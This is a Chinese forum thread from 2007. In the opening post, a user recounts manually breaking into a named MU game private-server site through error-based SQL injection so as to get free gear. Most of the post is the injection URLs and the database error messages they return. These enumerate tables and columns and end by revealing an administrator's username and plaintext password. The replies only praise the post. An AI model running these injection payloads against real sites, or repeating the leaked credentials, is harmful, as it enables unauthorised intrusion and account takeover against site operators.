您是本贴第 517 位浏览者 本府都督
帖子浏览: 玩奇迹SF手动注入全过程/朋友们看过来
  • 开心公主
  • 组别: 都督
  • 勋章:
  • 发贴: 307 贴
  • 货币: 10 腾格
  • 积分: 3003 分
  • 经验: 2959 点
  • 体力: 4336 点
  • 注册: 2007-07-22
  • 来自:
  • 浏览“开心公主”的博客
玩奇迹SF手动注入全过程/朋友们看过来
近来无聊,好上玩奇迹SF,对这东西没什么研究,打得不好,又想好装备,那就得一个方法了,搞定服务器!现在的目标就是http://www.mu1st.com/ 看了下整站,是ASP写的,感觉ASP的问题比较多,研究下,

http://www.mu1st.com/shownew.asp?id=76&61200969=1917469296 看见这么一个地址,感觉有问题,就在末端提交了一个单引号,。。。。返回正常页面。。。没戏哦,但就是感觉有问题,于是在id=76后面提交了一个单引号,返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。

/shownew.asp,行30

一看,典型的SQL注入,这个可以判断是SQL的数据库,废话,SF一般都是SQL的不是SQL怎么更新数据哦。

现在试探数据库名字。。。


http://www.mu1st.com/shownew.asp?id=76%20and%20user>0&61207360=1917469296

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'mudb' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

那当前用户的名字为 mudb 权限是普通的DB_OWNER,

http://www.mu1st.com/shownew.asp?id=76%20and%20db_name()>0&61209518=1917469296


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'mu1stnews' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

当前发数据库名字为:mu1stnews

http://www.mu1st.com/shownew.asp?id=76%20and%20(select%20top%201%20name%20from%20mu1stnews.dbo.sysobjects%20where%20xtype='U'%20and%20status>0)>0&61208248=1917469296

返回:



Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'visiter' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

现在就猜出第一个表:visiter 好继续猜下面的,

http://www.mu1st.com/shownew.asp?id=76and%20(select%20top%201%20name%20from%20mu1stnews.dbo.sysobjects%20where%20xtype='U'%20and%20status>0%20and%20name%20not%20in('visiter'))>0&61180014=1917469296

返回:

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'Aclass' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

现在就知道第二个表是:Aclass 继续

http://www.mu1st.com/shownew.asp?id=76and%20(select%20top%201%20name%20from%20mu1stnews.dbo.sysobjects%20where%20xtype='U'%20and%20status>0%20and%20name%20not%20in('Aclass'))>0&61181625=1917469296

返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'admin' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

呵呵,看见admin表了,没必要继续猜表了哦,那猜字段名咯,

http://www.mu1st.com/shownew.asp?id=76%20and%20(select%20top%201%20col_name(object_id('admin'),1)%20from%20admin)>0&61178414=1917469296

返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'id' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

这样得到第一个字段名:id,现在继续下去

http://www.mu1st.com/shownew.asp?id=76%20and%20(select%20top%201%20col_name(object_id('admin'),2)%20from%20admin)>0&61178816=1917469296

返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'username' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

得第二个字段名:username,还继续,

http://www.mu1st.com/shownew.asp?id=76%20and%20(select%20top%201%20col_name(object_id('admin'),3)%20from%20admin)>0&61178334=1917469296

返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'password' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

得第三个字段名:password,好,继续猜结果,

http://www.mu1st.com/shownew.asp?id=76%20and%20(select%20top%201%20username%20%20from%20admin)>0&61178953=1917469296

返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'topuncle' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

用户名就是topuncle了哦,现在看密码,

http://www.mu1st.com/shownew.asp?id=76%20and%20(select%20top%201%20password%20%20from%20admin)>0&61179382=1917469296

返回:


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'killu571' 转换为数据类型为 int 的列时发生语法错误。

/shownew.asp,行30

哈哈!密码明文显示的:killu571 就是密码了哦!

现在知道用户名是topuncle密码是killu571

剩下的搞网站的登陆处了,随便找找,其他的没必要说了哦!

这就是一次手工的简单的插入注入,用工具显然是看不出来的!
〖如果你所需的相关内容没有找到,请在下面综合搜索引擎中输入关键字进行搜索〗
Google
  • 2007-8-4 11:42:15 【上一贴】 【下一贴】
    • 风清扬
    • 组别: 都督
    • 勋章:
    • 发贴: 538 贴
    • 货币: 15 腾格
    • 积分: 6692 分
    • 经验: 6801 点
    • 体力: 4783 点
    • 注册: 2007-02-02
    • 来自: 乌鲁木齐市
    • 浏览“风清扬”的博客
    Re:玩奇迹SF手动注入全过程/朋友们看过来

    这个都贴过来了啊 ?
    厉害啊 !
    Life is like a box of chocolates,you never know what you're gonna get!
    生活就像一盒巧克力,你永远不知道你会得到什么。
    2007-8-16 17:43:03 【上一贴】 【下一贴】
    • 凌云将军·孤鱼
    • 组别: 都护
    • 勋章:
    • 发贴: 318 贴
    • 货币: 10 腾格
    • 积分: 3592 分
    • 经验: 3901 点
    • 体力: 2340 点
    • 注册: 2007-02-04
    • 来自: 山东
    • 浏览“凌云将军·孤鱼”的博客
    Re:玩奇迹SF手动注入全过程/朋友们看过来
    你还就是好厉害来
    这样也可以
    你玩不玩武林外传啊
    本贴已被 作者2007-10-18 16:14:0 编辑过
    总是对自己说:有点自信好不好?咱哥们怕过啥?/ 真是/男人!
    2007-10-18 16:13:26 【上一贴】 【下一贴】
    • 暗战
    • 组别: 都督
    • 勋章:
    • 发贴: 383 贴
    • 货币: 10 腾格
    • 积分: 4383 分
    • 经验: 4374 点
    • 体力: 3197 点
    • 注册: 2007-10-12
    • 来自:
    • 浏览“暗战”的博客
    Re:玩奇迹SF手动注入全过程/朋友们看过来
    这么麻烦的都发上来了,厉害!
    女强人
    2007-10-18 16:52:42 【上一贴】 【下一贴】
    快速回复: 玩奇迹SF手动注入全过程/朋友们看过来
    回复内容:


    UBB支持